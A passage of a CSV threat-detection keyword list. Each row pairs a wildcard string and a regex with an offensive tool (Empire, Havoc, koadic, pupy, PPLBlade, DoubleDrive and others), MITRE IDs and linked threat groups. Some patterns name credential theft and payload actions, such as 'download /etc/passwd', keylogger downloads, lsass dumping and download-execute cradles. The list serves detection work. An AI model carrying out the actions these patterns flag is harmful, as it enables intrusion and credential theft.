A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","1","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41432" "*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","41433" "*doredry/TokenFinder*",".{0,1000}doredry\/TokenFinder.{0,1000}","offensive_tool_keyword","TokenFinder","Tool to extract powerful tokens from Office desktop apps memory","T1003 - T1081 - T1110","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/doredry/TokenFinder","1","1","N/A","N/A","9","1","71","10","2024-03-01T14:27:34Z","2022-09-21T14:21:07Z","41434" "*dos-over-tor*",".{0,1000}dos\-over\-tor.{0,1000}","offensive_tool_keyword","dos-over-tor","Proof of concept denial of service over TOR stress test tool. 
Is multi-threaded and supports multiple attack vectors.","T1583 - T1090","TA0040 - TA0043","N/A","N/A","DDOS","https://github.com/skizap/dos-over-tor","1","0","N/A","N/A","N/A","1","41","13","2018-07-21T01:44:41Z","2018-07-26T07:05:37Z","41436" "*dothatlsassthing*",".{0,1000}dothatlsassthing.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","41437" "*dotnet ./Server.dll*",".{0,1000}dotnet\s\.\/Server\.dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","#linux","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","41438" "*dotnet inline-execute *",".{0,1000}dotnet\sinline\-execute\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","41439" "*dotnet Inveigh.dll*",".{0,1000}dotnet\sInveigh\.dll.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & 
Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","41440" "*dotnet ParseMalleable/ParseMalleable.dll*",".{0,1000}dotnet\sParseMalleable\/ParseMalleable\.dll.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","N/A","10","10","220","49","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z","41441" "*dotnet_serve_payload*",".{0,1000}dotnet_serve_payload.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","41442" "*DotNet2JSImplant*",".{0,1000}DotNet2JSImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","41443" "*DotNetArtifactGenerator.py*",".{0,1000}DotNetArtifactGenerator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","41444" "*DoubleAgent.sln*",".{0,1000}DoubleAgent\.sln.{0,1000}","offensive_tool_keyword","DoubleAgent","DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victims process boot. giving the attacker full control over the process and no way for the process to protect itself. The code injection technique is so unique that its not detected or blocked by any antivirus.DoubleAgent can continue injecting code even after reboot making it a perfect persistence technique to survive reboots/updates/reinstalls/patches/etc. Once the attacker decides to inject a DLL into a process. they are forcefully bounded forever. Even if the victim would completely uninstall and reinstall its program. 
the attackers DLL would still be injected every time the process executes.","T1055 - T1059 - T1053","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/Cybellum/DoubleAgent","1","1","N/A","N/A","N/A","10","1228","414","2022-08-24T10:32:36Z","2017-03-12T17:05:57Z","41445" "*doubledrive.cloud_drive.google_drive.google_drive*",".{0,1000}doubledrive\.cloud_drive\.google_drive\.google_drive.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","41446" "*doubledrive.cloud_ransomware*",".{0,1000}doubledrive\.cloud_ransomware.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","41447" "*doubledrive.endpoint_takeover_utils*",".{0,1000}doubledrive\.endpoint_takeover_utils.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","41448" "*DoUCMe-main\*",".{0,1000}DoUCMe\-main\\.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - 
T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","41449" "*douknowwhoami?d*",".{0,1000}douknowwhoami\?d.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","41450" "*download 
*bloodhound*",".{0,1000}download\s.{0,1000}bloodhound.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41451" "*download *Roaming\mRemoteNG\confCons.xml*",".{0,1000}download\s.{0,1000}Roaming\\mRemoteNG\\confCons\.xml.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM 
shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","41452" "*download /etc/passwd*",".{0,1000}download\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#linux","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","41453" "*download keylog.exe*",".{0,1000}download\skeylog\.exe.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - 
TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","1","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","41454" "*download.nus.edu.sg/mirror/blackarch/*/os/*",".{0,1000}download\.nus\.edu\.sg\/mirror\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","41459" "*download.weakpass.com/*",".{0,1000}download\.weakpass\.com\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","41464" "*Download:Cradle.js*",".{0,1000}Download\:Cradle\.js.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0011 - TA0009","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","N/A","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","41466" "*Download_Cradles.*",".{0,1000}Download_Cradles\..{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0011 - TA0009","N/A","N/A","Defense 
Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","N/A","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","41467" "*Download_Execute*",".{0,1000}Download_Execute.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","41468" "*DownloadAndExtractFromRemoteRegistry*",".{0,1000}DownloadAndExtractFromRemoteRegistry.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","41469" "*DownloadAndExtractFromRemoteRegistry*",".{0,1000}DownloadAndExtractFromRemoteRegistry.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","41470" "*DownloadAndExtractFromRemoteRegistry*",".{0,1000}DownloadAndExtractFromRemoteRegistry.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41471" "*Download-Cradles.cmd*",".{0,1000}Download\-Cradles\.cmd.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0011 - TA0009","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","N/A","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","41472" "*downloadexec_UACbypass.lua*",".{0,1000}downloadexec_UACbypass\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","41473" "*Download-Execute-PS*",".{0,1000}Download\-Execute\-PS.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","41474" "*DownloadFileImplant*",".{0,1000}DownloadFileImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. 
or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","41475" "*Downloading */*.tar to /tmp/*.pak*",".{0,1000}Downloading\s.{0,1000}\/.{0,1000}\.tar\sto\s\/tmp\/.{0,1000}\.pak.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","N/A","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","41476" 
"*Downloading AD-Recon PS scripts*",".{0,1000}Downloading\sAD\-Recon\sPS\sscripts.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41477" "*Downloading Empire PS scripts*",".{0,1000}Downloading\sEmpire\sPS\sscripts.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41478" "*Downloading FruityC2*",".{0,1000}Downloading\sFruityC2.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41479" "*Downloading latest Metasploit Framework*",".{0,1000}Downloading\slatest\sMetasploit\sFramework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","41480" "*Downloading Nishang PS scripts*",".{0,1000}Downloading\sNishang\sPS\sscripts.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41481" "*Downloading original SCNotification.exe.config via SMB*",".{0,1000}Downloading\soriginal\sSCNotification\.exe\.config\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","41482" "*Downloading PowerSploit PS 
scripts*",".{0,1000}Downloading\sPowerSploit\sPS\sscripts.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","41483" "*downloadMalwareDomains*",".{0,1000}downloadMalwareDomains.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","41485" "*downloads/wapiti-code*",".{0,1000}downloads\/wapiti\-code.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","41491" 